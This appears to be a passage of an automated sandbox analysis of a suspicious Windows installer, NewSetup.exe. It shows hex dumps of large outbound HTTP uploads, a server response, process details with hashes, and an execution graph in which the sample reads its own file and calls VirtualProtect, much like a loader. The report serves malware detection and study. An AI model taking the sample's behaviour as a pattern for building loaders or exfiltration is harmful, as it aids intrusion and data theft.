                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 80 93 38 45 82 06 31 20 5c cb b9 0e 6e 0c 6c 54 60 46 3e 82 00 0d 7c 0c ce bf 09 8e 04 17 c8 4f 11 a4 57 d5 50 6b 01 ec b7 c0 6c 3d a7 6f 16 82 18 42 c0 30 ab b6 1e b0 80 bb a8 92 c6 ed 6e 4e f0 05 ae ed 34 53 a4 1b ac 89 0d c2 d9 ff ae ae 6a d3 89 68 e9 53 ee e3 68 f6 c7 60 da 1f c4 e1 ea da 27 86 2a 7a f2 e4 36 b1 8f f1 bf 52 bf b5 5e c5 90 b0 e0 33 47 dd 0b ff b6 7d 43 f3 08 19 08 df 2d 80 b2 74 84 3f 41 3d 4e 5a 49 59 8f 1b db 36 be 46 bb 9e 22 02 dd 9e 33 1b a3 a1 02 50 5e 33 0b ed 45 1f 12 8f 63 dd 9c 06 42 d8 d8 d6 b5 ac c2 a7 71 87 9a af 08 a5 3f 29 20 85 e8 d5 e8 e9 55 7f 70 d4 f9 d7 1d 06 48 f9 7a 55 15 f5 76 ae ec 47 c4 6e e6 24 d2 4c c5 29 c5 73 a1 b9 84 14 9e 2c 65 28 b0 d7 b0 65 8e 48 d4 20 6a 9e a1 48 21 b4 62 76 fb 78 71 ae 10 cb 99 9b 03
                                                                                                    Data Ascii: 8E1 \nlT`F>|OWPkl=oB0nN4SjhSh`'*z6R^3G}C-t?A=NZIY6F"3P^3EcBq?) UpHzUvGn$L)s,e(eH jH!bvxq
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: d8 15 d6 59 e5 43 b2 87 58 d6 92 b6 e2 d0 6b 1b 6b 33 9c db 48 ba 27 f6 92 2d c9 8d cc 38 09 7b 85 0f ab ad ff b5 bd e1 8a 79 ab 62 9d 4d cf fa 15 d1 7d 66 72 48 fb a1 91 be 86 e6 ef 8f 45 b8 24 5c eb 71 c1 2b 12 ce b9 27 23 df d3 fd f8 6e cb 68 8e 55 89 63 2f 03 b7 41 aa aa d0 d3 f5 37 0d d9 4a 0f c9 3f cd 68 4b a9 4f 0f c4 ba 2d 66 b0 df ca 00 d6 e9 56 ba 6c d6 f0 a8 15 67 c2 ad cb b5 c5 9f 69 37 23 04 42 d5 f8 81 be 0f f1 21 04 fc 2e 73 89 c5 dc 03 84 07 eb 69 41 d7 8b 17 28 ac 34 b7 85 7d 07 cc b3 85 b6 75 fa 8a 54 9e 1e e4 99 7b 00 75 4d a6 1b b6 3f f9 31 93 3d 77 c5 31 a1 b4 92 7b a9 d8 bf 43 a6 7d b2 c5 3f 8a b8 38 62 7b 5c 4e 1c 78 b7 9a 0a e9 05 f1 62 ca 16 28 9c 9c b4 56 24 bb a5 87 bd f0 28 2a e8 97 6e 58 00 d9 e9 d3 ae c6 18 11 d0 2c 1e a1 1a
                                                                                                    Data Ascii: YCXkk3H'-8{ybM}frHE$\q+'#nhUc/A7J?hKO-fVlgi7#B!.siA(4}uT{uM?1=w1{C}?8b{\Nxb(V$(*nX,
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 47 6c 0f 68 ef 0c cb 8c 06 99 fe d0 a5 fc a0 9a 83 b4 30 f7 e7 d7 e8 e2 a0 14 c9 1d 08 a5 23 80 e4 03 de 89 1f d8 55 5f 08 cd b9 08 31 44 39 4f 63 0b 54 96 92 26 bd 30 88 71 88 fe 25 b7 00 4d ad 90 bf 8b b8 0c dc e4 42 c5 c1 e5 dc 9c c2 b6 16 cc 75 5a 6c 05 da f3 74 4a bb 83 fe 82 d5 58 55 e4 bd 69 6c a7 14 55 5a 78 bf e8 ef be 62 96 2b 7e dd 5d 31 13 41 24 1a 1e 42 21 a0 ad 5e 9e 3c 80 43 b0 b3 8f 62 05 f0 41 28 4e 28 1c 5f ea a9 17 e3 37 cf 12 02 fd eb 77 e5 aa 55 63 b7 30 3c 62 b2 e2 ff 25 87 35 86 a4 f2 37 4a 51 4b 7f f5 e8 41 7c 7c 6f 04 44 45 6d 33 d4 b6 19 b0 7c 00 62 d8 e8 17 35 6f b1 d2 7e 63 fe fe cc c3 43 4d 65 05 e2 34 65 b6 8b 41 8a 16 04 6d 77 0a 9f 04 3a 7f ea fe c8 b3 0f c2 46 7e a3 7f 54 24 a0 52 7d 4a 5f 9a 66 04 ff 31 64 28 c0 6e f9 b1
                                                                                                    Data Ascii: Glh0#U_1D9OcT&0q%MBuZltJXUilUZxb+~]1A$B!^<CbA(N(_7wUc0<b%57JQKA||oDEm3|b5o~cCMe4eAmw:F~T$R}J_f1d(n
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: f7 2b 5e 67 c6 ef 1b 67 37 86 c6 8f 9c fa fa df 81 d6 9f df 58 96 63 19 15 fc f6 f3 e6 1c 65 96 55 33 ff 40 9c 3f a9 84 b5 78 8f 6b 96 ba 7a 9c 16 d3 2b 39 32 f0 e2 2c dd fb 04 e3 fa a0 a0 36 25 20 6a 5f 0b 6d 25 67 63 00 5b d0 ac 83 80 59 03 33 02 24 06 3f 5b 19 6b 7f e7 d7 f1 7d 6f 73 4a 3f f9 b3 a7 1a 86 53 f2 cb af cd 71 af 12 3f 95 ff bd bd 66 a9 70 f1 5e 6d 6c af d0 7a 71 38 9b 05 df 4d 34 a2 5e 3a 68 bd 74 1c 83 6a 18 89 5f 3d 5c 45 ff 40 33 03 a4 39 09 94 da b2 cb c2 bd d1 1c 70 6e 48 97 b5 7c b5 fa fd 9c 54 26 64 38 57 4c 57 5a 74 c1 c1 fe c7 1a 16 ef bd 5f 0f 83 ad da e6 a8 0d eb 1a a5 f3 32 c5 7c 13 ce 7a 0a af 08 9c 58 f3 89 ba 92 79 71 f8 f8 fa 27 25 30 2b b3 34 1c dd f2 42 c6 47 c0 fc 34 ca a5 86 1e cf 1d 8e 38 fb 52 73 b8 5a 1d 74 cd 79 6c
                                                                                                    Data Ascii: +^gg7XceU3@?xkz+92,6% j_m%gc[Y3$?[k}osJ?Sq?fp^mlzq8M4^:htj_=\E@39pnH|T&d8WLWZt_2|zXyq'%0+4BG48RsZtyl
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 99 b8 24 e8 1a 74 f8 61 06 0f f8 56 a1 35 97 b5 81 1b 86 c0 c8 cd ed af 32 f4 a6 5a 6f ec e2 28 a3 77 ff 45 52 cb 33 5f 86 e6 10 07 3f 83 33 bc bb a1 22 ad 36 16 44 52 95 0d ae 36 b8 d1 dc 2d 8e 85 04 7f 6f e9 55 bc 62 f8 f5 a3 0a 35 9b eb d0 76 77 36 bc 36 72 e3 cb 56 c7 11 6b a0 f5 00 56 98 87 d8 3f c4 46 9e fd 21 ab 8f 7e 89 cf d4 6f 52 04 53 27 45 00 e1 bc 4c 9a 0d 0a a6 a0 11 22 91 38 96 c6 f8 e7 e0 4f 93 f6 d5 4d 9d 85 cc 0c 23 64 c8 bb 8a 7d a8 40 1b 2c ba ad d5 8c 96 14 5f 27 26 5f 1c 37 de ad d8 56 28 dd 5c 79 c0 93 c3 3c 1e ce 3e be 5d 64 b8 66 f4 3a 51 5a 59 d8 a5 30 31 02 7d 3b c1 4d 97 74 06 d5 5b 29 19 28 7b d5 9c 27 fa 97 4d 6e 38 e8 33 a3 a6 ad 3f 39 dd 34 b5 a3 18 91 b6 cf 3e 48 9d 76 7c d6 e1 81 03 0e c8 0a eb 79 37 2d 1d 78 4a 5f 4e 9a
                                                                                                    Data Ascii: $taV52Zo(wER3_?3"6DR6-oUb5vw66rVkV?F!~oRS'EL"8OM#d}@,_'&_7V(\y<>]df:QZY01};Mt[)({'Mn83?94>Hv|y7-xJ_N
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: fb 01 62 9a 85 6e 6e 05 af d4 6d 8d 6e d8 a6 a8 11 28 54 ce 86 cf f7 d5 69 3e b3 11 da fa e3 ef 9b 80 6b e5 61 40 9b 2b e3 84 da 96 b8 ae 38 58 1a d2 b2 0a 46 9b 06 ea 48 eb 4c a4 90 44 4a d0 6c 01 eb fe d1 8e 11 ce 9f ee 04 7d 64 f1 54 bb d8 f3 08 2d 00 4d 54 23 d9 c2 a0 7f be 72 ca 08 c5 ca b1 f9 be 06 fd 5f 6e 86 02 dc 50 2c b0 b7 05 4a 8d 0a 55 a9 ef 7f a1 9c 1a 27 58 ae 37 f5 98 ab e4 7e 18 98 4c 3d 46 2b ed 02 7b 3f 36 84 76 a8 66 42 a8 40 c9 7c 2e 67 37 36 95 1d aa 9c 95 ce 41 ca 2c 1d da 50 7a b4 8f 6f 50 70 bf 0b e6 f4 8f 8d 30 b5 0d 51 7f 2f e6 4f 01 41 f2 90 41 01 a9 27 a1 52 2e ff 7d a2 c4 b8 2b f6 e2 78 85 db df 77 1a 1f aa e6 07 a5 8a a9 4d f2 03 89 96 20 31 0c ee d1 07 b2 8c a0 dd 9a e0 e4 71 e5 d2 0b 94 f8 2d d1 d5 77 2e 38 ee 98 1d ec a7
                                                                                                    Data Ascii: bnnmn(Ti>ka@+8XFHLDJl}dT-MT#r_nP,JU'X7~L=F+{?6vfB@|.g76A,PzoPp0Q/OAA'R.}+xwM 1q-w.8
                                                                                                    2024-12-27 21:40:15 UTC1141INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=e2saajljqofe1bi0607dgmpkms; expires=Tue, 22 Apr 2025 15:26:54 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hevb660EUI4r2b1HQ%2FSCMpMRq%2BI1pCuouv1SGh9rhajLj7LMXjryAy46vEtzhWVuqzxTHx98aY0Xd82P81iF9I0yimYFknQxFfqWAUm5AjFJ7j2oh7Vv%2B7xnU6yk31NZJPNRBddsOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77bf1aed0f87-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1604&rtt_var=635&sent=328&recv=611&lost=0&retrans=0&sent_bytes=2853&recv_bytes=590925&delivery_rate=1679125&cwnd=229&unsent_bytes=0&cid=630a0489cbbf1d17&ts=2559&x=0"


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:16:39:53
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Users\user\Desktop\NewSetup.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\NewSetup.exe"
                                                                                                    Imagebase:0x210000
                                                                                                    File size:569'384 bytes
                                                                                                    MD5 hash:E8C9377A0DDDC131E2291C3D7F4D69ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:16:39:53
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:16:39:54
                                                                                                    Start date:27/12/2024
                                                                                                    Path:C:\Users\user\Desktop\NewSetup.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\NewSetup.exe"
                                                                                                    Imagebase:0x210000
                                                                                                    File size:569'384 bytes
                                                                                                    MD5 hash:E8C9377A0DDDC131E2291C3D7F4D69ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.5%
                                                                                                      Dynamic/Decrypted Code Coverage:1%
                                                                                                      Signature Coverage:3.7%
                                                                                                      Total number of Nodes:801
                                                                                                      Total number of Limit Nodes:12
                                                                                                      execution_graph 20088 220312 20089 22031e ___scrt_is_nonwritable_in_current_image 20088->20089 20114 21a8ca 20089->20114 20091 220325 20092 22047e 20091->20092 20102 22034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20091->20102 20156 21f8e9 4 API calls 2 library calls 20092->20156 20094 220485 20149 225545 20094->20149 20098 220493 20099 22036e 20100 2203ef 20125 227abc 20100->20125 20102->20099 20102->20100 20152 22558f 39 API calls 4 library calls 20102->20152 20104 2203f5 20129 2124b0 GetConsoleWindow ShowWindow 20104->20129 20108 220416 20108->20094 20109 22041a 20108->20109 20110 220423 20109->20110 20154 225571 21 API calls CallUnexpected 20109->20154 20155 21a903 75 API calls ___scrt_uninitialize_crt 20110->20155 20113 22042c 20113->20099 20115 21a8d3 20114->20115 20158 21f555 IsProcessorFeaturePresent 20115->20158 20117 21a8df 20159 220cc8 10 API calls 2 library calls 20117->20159 20119 21a8e4 20124 21a8e8 20119->20124 20160 223230 20119->20160 20122 21a8ff 20122->20091 20124->20091 20126 227ac5 20125->20126 20127 227aca 20125->20127 20173 227be5 59 API calls 20126->20173 20127->20104 20174 21a663 20129->20174 20133 212513 20134 212554 20133->20134 20135 21251d 20133->20135 20201 21b317 30 API calls 2 library calls 20134->20201 20136 212524 GetCurrentThreadId 20135->20136 20137 21256c 20135->20137 20139 21257d 20136->20139 20140 21252d 20136->20140 20202 21b317 30 API calls 2 library calls 20137->20202 20203 21b317 30 API calls 2 library calls 20139->20203 20200 21f11d WaitForSingleObjectEx GetExitCodeThread CloseHandle 20140->20200 20144 21253a 20145 21258e 20144->20145 20146 212541 20144->20146 20204 21b317 30 API calls 2 library calls 20145->20204 20153 21f896 GetModuleHandleW 20146->20153 20359 225690 20149->20359 20152->20100 20153->20108 20154->20110 20155->20113 20156->20094 20157 22555b 21 API calls CallUnexpected 20157->20098 20158->20117 20159->20119 20164 22e2e9 20160->20164 20163 220ce7 7 API calls 2 library calls 20163->20124 20165 22e2f9 20164->20165 20166 21a8f1 20164->20166 20165->20166 20168 22da52 20165->20168 20166->20122 20166->20163 20169 22da59 20168->20169 20170 22da9c GetStdHandle 20169->20170 20171 22dafe 20169->20171 20172 22daaf GetFileType 20169->20172 20170->20169 20171->20165 20172->20169 20173->20127 20176 21a668 _Yarn 20174->20176 20175 2124f3 20185 225349 20175->20185 20176->20175 20178 21a684 20176->20178 20205 225877 EnterCriticalSection LeaveCriticalSection codecvt 20176->20205 20179 21f338 codecvt 20178->20179 20180 21a68e Concurrency::cancel_current_task 20178->20180 20207 22060c RaiseException 20179->20207 20206 22060c RaiseException 20180->20206 20183 21f354 20184 21b4ce 20186 225356 20185->20186 20187 22536a 20185->20187 20217 2276e4 14 API calls __strnicoll 20186->20217 20208 2253da 20187->20208 20191 22535b 20218 227dcf 29 API calls __strnicoll 20191->20218 20192 22537f CreateThread 20194 22539e GetLastError 20192->20194 20195 2253aa 20192->20195 20246 225470 20192->20246 20219 22770a 14 API calls 2 library calls 20194->20219 20220 22542a 20195->20220 20196 225366 20196->20133 20200->20144 20205->20176 20206->20184 20207->20183 20228 22d2b4 20208->20228 20213 2253ff GetModuleHandleExW 20214 22541c 20213->20214 20215 22542a 16 API calls 20214->20215 20216 225376 20215->20216 20216->20192 20216->20195 20217->20191 20218->20196 20219->20195 20221 225436 20220->20221 20222 2253b5 20220->20222 20223 225445 20221->20223 20224 22543c CloseHandle 20221->20224 20222->20133 20225 225454 20223->20225 20226 22544b FreeLibrary 20223->20226 20224->20223 20227 22bed7 ___free_lconv_mon 14 API calls 20225->20227 20226->20225 20227->20222 20229 22d2c1 20228->20229 20230 22d301 20229->20230 20231 22d2ec HeapAlloc 20229->20231 20234 22d2d5 __Getctype 20229->20234 20244 2276e4 14 API calls __strnicoll 20230->20244 20232 22d2ff 20231->20232 20231->20234 20235 2253eb 20232->20235 20234->20230 20234->20231 20243 225877 EnterCriticalSection LeaveCriticalSection codecvt 20234->20243 20237 22bed7 20235->20237 20238 22bee2 RtlFreeHeap 20237->20238 20239 2253f8 20237->20239 20238->20239 20240 22bef7 GetLastError 20238->20240 20239->20213 20239->20214 20241 22bf04 __dosmaperr 20240->20241 20245 2276e4 14 API calls __strnicoll 20241->20245 20243->20234 20244->20235 20245->20239 20247 22547c ___scrt_is_nonwritable_in_current_image 20246->20247 20248 225483 GetLastError ExitThread 20247->20248 20249 225490 20247->20249 20260 22c16a GetLastError 20249->20260 20254 2254ac 20291 2253cc 20254->20291 20261 22c180 20260->20261 20262 22c186 20260->20262 20295 22cb94 6 API calls std::_Locinfo::_Locinfo_dtor 20261->20295 20266 22c18a SetLastError 20262->20266 20296 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20262->20296 20265 22c1a2 20265->20266 20268 22d2b4 __Getctype 14 API calls 20265->20268 20270 225495 20266->20270 20271 22c21f 20266->20271 20269 22c1b7 20268->20269 20272 22c1d0 20269->20272 20273 22c1bf 20269->20273 20287 22f767 20270->20287 20301 228353 39 API calls CallUnexpected 20271->20301 20298 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20272->20298 20297 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20273->20297 20278 22c1cd 20283 22bed7 ___free_lconv_mon 14 API calls 20278->20283 20279 22c1dc 20280 22c1e0 20279->20280 20281 22c1f7 20279->20281 20299 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20280->20299 20300 22c47c 14 API calls __Getctype 20281->20300 20283->20266 20285 22c202 20286 22bed7 ___free_lconv_mon 14 API calls 20285->20286 20286->20266 20288 2254a0 20287->20288 20289 22f777 CallUnexpected 20287->20289 20288->20254 20294 22cde0 5 API calls std::_Locinfo::_Locinfo_dtor 20288->20294 20289->20288 20302 22ce89 20289->20302 20320 2254ee 20291->20320 20293 2253d9 20294->20254 20295->20262 20296->20265 20297->20278 20298->20279 20299->20278 20300->20285 20305 22cfd6 20302->20305 20306 22cea5 20305->20306 20307 22d006 20305->20307 20306->20288 20307->20306 20312 22cf0b 20307->20312 20310 22d020 GetProcAddress 20310->20306 20311 22d030 std::_Locinfo::_Locinfo_dtor 20310->20311 20311->20306 20318 22cf1c ___vcrt_InitializeCriticalSectionEx 20312->20318 20313 22cfb2 20313->20306 20313->20310 20314 22cf3a LoadLibraryExW 20315 22cf55 GetLastError 20314->20315 20316 22cfb9 20314->20316 20315->20318 20316->20313 20317 22cfcb FreeLibrary 20316->20317 20317->20313 20318->20313 20318->20314 20319 22cf88 LoadLibraryExW 20318->20319 20319->20316 20319->20318 20329 22c2bb GetLastError 20320->20329 20322 22553b ExitThread 20323 2254f9 20323->20322 20324 225512 20323->20324 20352 22ce1b 5 API calls std::_Locinfo::_Locinfo_dtor 20323->20352 20326 225525 20324->20326 20327 22551e CloseHandle 20324->20327 20326->20322 20328 225531 FreeLibraryAndExitThread 20326->20328 20327->20326 20328->20322 20330 22c2d1 20329->20330 20331 22c2d7 20329->20331 20353 22cb94 6 API calls std::_Locinfo::_Locinfo_dtor 20330->20353 20335 22c2db SetLastError 20331->20335 20354 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20331->20354 20334 22c2f3 20334->20335 20337 22d2b4 __Getctype 12 API calls 20334->20337 20335->20323 20338 22c308 20337->20338 20339 22c310 20338->20339 20340 22c321 20338->20340 20355 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20339->20355 20356 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20340->20356 20343 22c31e 20348 22bed7 ___free_lconv_mon 12 API calls 20343->20348 20344 22c32d 20345 22c331 20344->20345 20346 22c348 20344->20346 20357 22cbd3 6 API calls std::_Locinfo::_Locinfo_dtor 20345->20357 20358 22c47c 14 API calls __Getctype 20346->20358 20348->20335 20350 22c353 20351 22bed7 ___free_lconv_mon 12 API calls 20350->20351 20351->20335 20352->20324 20353->20331 20354->20334 20355->20343 20356->20344 20357->20343 20358->20350 20360 2256cf 20359->20360 20361 2256bd 20359->20361 20371 22582a 20360->20371 20386 21f896 GetModuleHandleW 20361->20386 20364 2256c2 20364->20360 20387 2255c4 GetModuleHandleExW 20364->20387 20366 22048b 20366->20157 20369 225721 20372 225836 ___scrt_is_nonwritable_in_current_image 20371->20372 20393 2280e1 EnterCriticalSection 20372->20393 20374 225840 20394 225727 20374->20394 20376 22584d 20398 22586b 20376->20398 20379 22565f 20403 225646 20379->20403 20381 225669 20382 22567d 20381->20382 20383 22566d GetCurrentProcess TerminateProcess 20381->20383 20384 2255c4 CallUnexpected 3 API calls 20382->20384 20383->20382 20385 225685 ExitProcess 20384->20385 20386->20364 20388 225603 GetProcAddress 20387->20388 20389 225624 20387->20389 20388->20389 20390 225617 20388->20390 20391 225633 20389->20391 20392 22562a FreeLibrary 20389->20392 20390->20389 20391->20360 20392->20391 20393->20374 20395 225733 ___scrt_is_nonwritable_in_current_image CallUnexpected 20394->20395 20397 225797 CallUnexpected 20395->20397 20401 2273fe 14 API calls 3 library calls 20395->20401 20397->20376 20402 2280f8 LeaveCriticalSection 20398->20402 20400 225706 20400->20366 20400->20379 20401->20397 20402->20400 20406 22f740 5 API calls CallUnexpected 20403->20406 20405 22564b CallUnexpected 20405->20381 20406->20405 20407 21b060 20430 21afc4 GetModuleHandleExW 20407->20430 20410 21afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20414 21b0ac 20410->20414 20412 21b09a 20439 21efd2 20412->20439 20415 21b0cd 20414->20415 20442 21afa7 GetModuleHandleExW 20414->20442 20432 217770 20415->20432 20416 21b0a6 20416->20410 20418 21b0bd 20418->20415 20419 21b0c3 FreeLibraryWhenCallbackReturns 20418->20419 20419->20415 20420 21b0dd 20421 21afc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20420->20421 20422 21b0e3 20421->20422 20423 21b111 20422->20423 20443 21aefa 37 API calls std::_Throw_Cpp_error 20422->20443 20425 21b0ef 20426 21efd2 ReleaseSRWLockExclusive 20425->20426 20427 21b102 20426->20427 20427->20423 20444 21e95d WakeAllConditionVariable 20427->20444 20431 21afda 20430->20431 20431->20416 20438 21aefa 37 API calls std::_Throw_Cpp_error 20431->20438 20433 2177af 20432->20433 20445 218aa0 20433->20445 20434 2177b9 20450 21af64 CloseThreadpoolWork 20434->20450 20436 2177cb 20436->20420 20438->20412 20440 21efed 20439->20440 20441 21efdf ReleaseSRWLockExclusive 20439->20441 20440->20416 20441->20440 20442->20418 20443->20425 20444->20423 20446 218add 20445->20446 20447 218ae8 20446->20447 20451 2190e0 20446->20451 20468 2190f0 20446->20468 20447->20434 20450->20436 20452 2190ea 20451->20452 20484 21efc1 20452->20484 20455 2191c7 20494 21b317 30 API calls 2 library calls 20455->20494 20456 219136 20458 219143 20456->20458 20459 2191ce 20456->20459 20460 219174 20458->20460 20461 21914b 20458->20461 20495 21b317 30 API calls 2 library calls 20459->20495 20463 21efd2 ReleaseSRWLockExclusive 20460->20463 20464 21efd2 ReleaseSRWLockExclusive 20461->20464 20465 219181 20463->20465 20466 219151 std::_Throw_Cpp_error 20464->20466 20487 2192f0 20465->20487 20466->20447 20469 21efc1 12 API calls 20468->20469 20470 21912b 20469->20470 20471 2191c7 20470->20471 20472 219136 20470->20472 20531 21b317 30 API calls 2 library calls 20471->20531 20474 219143 20472->20474 20475 2191ce 20472->20475 20476 219174 20474->20476 20477 21914b 20474->20477 20532 21b317 30 API calls 2 library calls 20475->20532 20479 21efd2 ReleaseSRWLockExclusive 20476->20479 20480 21efd2 ReleaseSRWLockExclusive 20477->20480 20482 219181 20479->20482 20481 219151 std::_Throw_Cpp_error 20480->20481 20481->20447 20483 2192f0 66 API calls 20482->20483 20483->20481 20496 21eff1 GetCurrentThreadId 20484->20496 20520 219620 20487->20520 20490 21939f 20529 219400 66 API calls std::_Throw_Cpp_error 20490->20529 20493 2193ae 20493->20466 20497 21f01b 20496->20497 20498 21f03a 20496->20498 20501 21f020 AcquireSRWLockExclusive 20497->20501 20502 21f030 20497->20502 20499 21f043 20498->20499 20500 21f05a 20498->20500 20499->20502 20503 21f04e AcquireSRWLockExclusive 20499->20503 20504 21f0b9 20500->20504 20510 21f072 20500->20510 20501->20502 20511 21a6e1 20502->20511 20503->20502 20504->20502 20506 21f0c0 TryAcquireSRWLockExclusive 20504->20506 20506->20502 20507 21912b 20507->20455 20507->20456 20509 21f0a9 TryAcquireSRWLockExclusive 20509->20502 20509->20510 20510->20502 20510->20509 20518 21fdcd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 20510->20518 20512 21a6e9 20511->20512 20513 21a6ea IsProcessorFeaturePresent 20511->20513 20512->20507 20515 21f447 20513->20515 20519 21f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20515->20519 20517 21f52a 20517->20507 20518->20510 20519->20517 20521 219667 20520->20521 20522 21a663 codecvt 3 API calls 20521->20522 20523 21935f 20522->20523 20524 2194f0 20523->20524 20525 219536 std::_Throw_Cpp_error 20524->20525 20528 219540 std::_Throw_Cpp_error 20525->20528 20530 21b57d RaiseException Concurrency::cancel_current_task 20525->20530 20528->20490 20529->20493 20533 2198f0 20534 21990f 20533->20534 20537 2198f9 20533->20537 20547 21b57d RaiseException Concurrency::cancel_current_task 20534->20547 20540 212270 GetModuleHandleA GetModuleFileNameW 20537->20540 20548 22a89a 20540->20548 20542 2122b0 20552 211fb0 GetPEB 20542->20552 20545 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20546 2122ca 20545->20546 20549 22a8ad _Fputc 20548->20549 20575 22a90f 20549->20575 20551 22a8bf _Fputc 20551->20542 20606 211240 20552->20606 20556 212041 GetFileSize 20558 212055 20556->20558 20559 2121fc CloseHandle 20556->20559 20557 212225 20557->20545 20560 21205d ReadFile 20558->20560 20559->20557 20561 2121f3 20560->20561 20562 212079 CloseHandle 20560->20562 20561->20559 20563 212205 20562->20563 20574 212090 _Yarn codecvt _strlen 20562->20574 20618 211ef0 20563->20618 20565 21223b 20637 212600 30 API calls std::_Throw_Cpp_error 20565->20637 20567 212247 20638 227ddf 29 API calls 2 library calls 20567->20638 20569 21a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20569->20574 20574->20563 20574->20565 20574->20567 20574->20569 20631 211000 20574->20631 20576 22a93f 20575->20576 20577 22a94e 20576->20577 20578 22a96c 20576->20578 20596 22a943 20576->20596 20599 227f78 29 API calls 2 library calls 20577->20599 20580 22a979 20578->20580 20600 223790 39 API calls _Fputc 20578->20600 20583 22a993 20580->20583 20584 22a9b1 20580->20584 20581 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20587 22abb4 20581->20587 20601 2366fb 5 API calls 3 library calls 20583->20601 20585 22ab41 20584->20585 20586 22a9c5 20584->20586 20585->20596 20605 22c021 WideCharToMultiByte _Fputc 20585->20605 20590 22aa5f 20586->20590 20594 22aa09 20586->20594 20586->20596 20587->20551 20603 22c021 WideCharToMultiByte _Fputc 20590->20603 20593 22aa72 20595 22aa8b GetLastError 20593->20595 20593->20596 20602 22c021 WideCharToMultiByte _Fputc 20594->20602 20595->20596 20598 22aa9a 20595->20598 20596->20581 20598->20596 20604 22c021 WideCharToMultiByte _Fputc 20598->20604 20599->20596 20600->20580 20601->20596 20602->20596 20603->20593 20604->20598 20605->20596 20616 211283 _Yarn codecvt _strlen 20606->20616 20617 211402 CreateFileA 20606->20617 20607 211422 20639 212600 30 API calls std::_Throw_Cpp_error 20607->20639 20609 21142e 20640 227ddf 29 API calls 2 library calls 20609->20640 20610 21a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20610->20616 20613 211000 102 API calls 20613->20616 20616->20607 20616->20609 20616->20610 20616->20613 20616->20617 20617->20556 20617->20557 20619 211240 102 API calls 20618->20619 20620 211f18 FreeConsole 20619->20620 20641 2114b0 20620->20641 20622 211f39 20623 2114b0 103 API calls 20622->20623 20624 211f4a 20623->20624 20625 211240 102 API calls 20624->20625 20626 211f5d VirtualProtect 20625->20626 20628 211f7e 20626->20628 20629 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20628->20629 20630 211fa3 20629->20630 20630->20557 20632 211013 20631->20632 20847 212750 20632->20847 20645 2114f0 20641->20645 20646 211702 codecvt 20645->20646 20647 2116dd 20645->20647 20651 214320 20645->20651 20664 211750 